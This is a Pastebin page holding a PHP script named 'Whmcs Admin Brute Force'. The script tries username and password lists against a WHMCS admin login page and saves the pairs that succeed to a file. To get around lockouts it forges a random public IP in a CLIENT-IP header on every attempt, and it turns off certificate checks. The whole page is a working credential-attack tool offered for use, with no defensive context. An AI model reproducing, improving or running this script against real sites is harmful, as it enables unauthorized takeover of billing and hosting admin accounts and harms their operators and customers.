Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- echo "
- _____ _ _ _____ _____ _______
- / ___| | | | | / _ \ / ___/|__ __|
- | | _ | |__| | | | | | | |___ | |
- | | | | | __ | | | | | \___ \ | |
- | |_| | | | | | | |_| | ___| | | |
- \_____/ |_| |_| \_____/ /_____/ |_|
- ____ _ _____ _____ _____ ___ ___
- | _ \ | | / _ \ / _ \ | _ \ \ \ / /
- | |_) | | | | | | | | | | | | | | \ \ \/ /
- | _ ( | | | | | | | | | | | | | | \ /
- | |_) | | |___ | |_| | | |_| | | |_| / | |
- |____/ |_____| \_____/ \_____/ |_____/ |__|
- [*]-----------------------------------------------------------------------[*]
- [+] Tool : Whmcs Admin Brute Force
- [+] Version : 1.0
- [+] Programed By : G-B
- [+] Email : g22b@hotmail.com
- [+] Facebook : /G22Bh
- [*]-----------------------------------------------------------------------[*]
- ";
- $target = stdin("Target (http://target.com/whmcs/admin)","url");
- $userlist = stdin("Usernames List","file");
- $passlist = stdin("Passwords List","file");
- $fp = fopen("Result.txt","a");
- $ips = array();
- foreach(explode("\n",$userlist) as $user){
- $user = trim($user);
- if($user == "") continue;
- foreach(explode("\n",$passlist) as $pass){
- $pass = trim($pass);
- if($pass == "") continue;
- echo "Try $user $pass : ";
- while (true) {
- $ip = long2ip(rand(11111,99999999999));
- if(!in_array($ip,$ips)&&check_ip($ip)){
- $ips[] = $ip;
- break;
- }
- }
- if(login($target,$user,$pass)){
- echo "Success.\n";
- fwrite($fp,"Target : $target\r\nUsername : $user\r\nPassword : $pass\r\n===================================\r\n");
- break;
- }else{
- echo "Error.\n";
- }
- }
- }
- echo "\n\nDone. Check Result.txt from result.\n";
- fclose($fp);
- function login($url,$user,$pass){
- global $ip;
- $post = array('username'=>$user,'password'=>$pass,'rememberme'=>'on');
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,"$url/dologin.php");
- curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,false);
- curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- curl_setopt($ch,CURLOPT_HTTPHEADER,array("CLIENT-IP: $ip"));
- curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($ch,CURLOPT_POST,true);
- curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
- curl_setopt($ch,CURLOPT_HEADER,true);
- curl_setopt($ch,CURLOPT_REFERER,"$url/login.php");
- $return = curl_exec($ch);
- curl_close($ch);
- //echo $return;
- if(preg_match('/Location\: index\.php/',$return)){
- return true;
- }else{
- return false;
- }
- }
- function check_ip($ip) {
- if ((!empty($ip) && ip2long($ip) != 0 - 1) && ip2long($ip) != false) {
- $private_ips = array(array("0.0.0.0", "2.255.255.255"), array("10.0.0.0", "10.255.255.255"), array("127.0.0.0", "127.255.255.255"), array("169.254.0.0", "169.254.255.255"), array("172.16.0.0", "172.31.255.255"), array("192.0.2.0", "192.0.2.255"), array("192.168.0.0", "192.168.255.255"), array("255.255.255.0", "255.255.255.255"));
- foreach ($private_ips as $r) {
- $min = ip2long($r[0]);
- $max = ip2long($r[1]);
- if ($min <= ip2long($ip) && ip2long($ip) <= $max) {
- return false;
- continue;
- }
- }
- return true;
- }
- return false;
- }
- function stdin($mess,$cond){
- while(true){
- echo "$mess -> ";
- $value = trim(fgets(STDIN));
- if($cond=="file" && $file = @file_get_contents($value)){
- return $file;
- break;
- }elseif($cond=="url" && filter_var($value,FILTER_VALIDATE_URL)){
- return $value;
- break;
- }elseif($cond=="email" && filter_var($value,FILTER_VALIDATE_EMAIL)){
- return $value;
- break;
- }else{
- echo "Invalid $cond. Try again.\n\n";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement